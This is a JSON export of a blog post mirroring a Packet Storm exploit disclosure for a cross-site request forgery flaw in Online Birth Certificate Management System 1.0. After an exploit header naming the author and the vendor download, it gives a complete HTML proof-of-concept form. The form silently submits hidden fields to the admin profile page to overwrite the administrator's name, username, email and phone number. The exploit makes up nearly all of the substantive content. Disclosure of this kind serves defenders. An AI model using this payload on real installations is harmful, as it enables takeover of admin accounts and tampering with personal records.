{"id":31146,"date":"2022-09-27T20:58:34","date_gmt":"2022-09-27T17:58:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168522\/obcms10-xsrf.txt"},"modified":"2022-09-28T15:04:43","modified_gmt":"2022-09-28T11:34:43","slug":"online-birth-certificate-management-system-1-0-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-birth-certificate-management-system-1-0-cross-site-request-forgery\/","title":{"rendered":"Online Birth Certificate Management System 1.0 Cross Site Request Forgery"},"content":{"rendered":"<dl id=\"F168522\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 1.1 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/168522\/obcms10-xsrf.txt\" target=\"_blank\" rel=\"noopener\"><strong>Online Birth Certificate Management System 1.0 Cross Site Request Forgery<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"15:44:39 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-09-27\/\" target=\"_blank\" rel=\"noopener\">Sep 27, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16435\/\" target=\"_blank\" rel=\"noopener\">Yousef Alraddadi<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/csrf\" target=\"_blank\" rel=\"noopener\">csrf<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">SHA-256 | <code>f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 1.1 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/168522\/obcms10-xsrf.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/168522\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/168522\/Online-Birth-Certificate-Management-System-1.0-Cross-Site-Request-Forgery.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code># Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)\r\n# Google Dork: N\/A\r\n# Date: 2022-9-27\r\n# Exploit Author: yousef alraddadi - https:\/\/twitter.com\/y0usef_11\r\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15683\/online-birth-certificate-management-system-php-free-download.html\r\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/OBCMS.zip\r\n# Tested on: windows 11 - XAMPP\r\n# CVE : N\/A\r\n# Version: 1.0<\/code><\/pre>\n<p># no token in update profile admin<\/p>\n<pre><code><\/code><\/pre>\n<p>&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;title&gt; CSRF update Profile &lt;\/title&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;form action=&#8221;http:\/\/localhost\/OBCMS\/admin\/profile.php&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart\/form-data&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;adminname&#8221; value=&#8221;csrf111&#8243;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;username&#8221; value=&#8221;csrf&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;email&#8221; value=&#8221;csrf&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;mobilenumber&#8221; value=&#8221;0&#8243;&gt;<br \/>\n&lt;button class=&#8221;btn btn-sm btn-primary login-submit-cs&#8221; type=&#8221;submit&#8221; name=&#8221;submit&#8221;&gt;Save Change&lt;\/button&gt;<br \/>\n&lt;\/form&gt;<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Online Birth Certificate Management System 1.0 Cross Site Request Forgery Posted Sep 27, 2022 Authored by Yousef Alraddadi Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability. tags | exploit, csrf SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe Download | Favorite | View # Exploit Title: Online Birth Certificate Management System &#8211; Cross &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31146","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31146"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146\/revisions"}],"predecessor-version":[{"id":31207,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146\/revisions\/31207"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}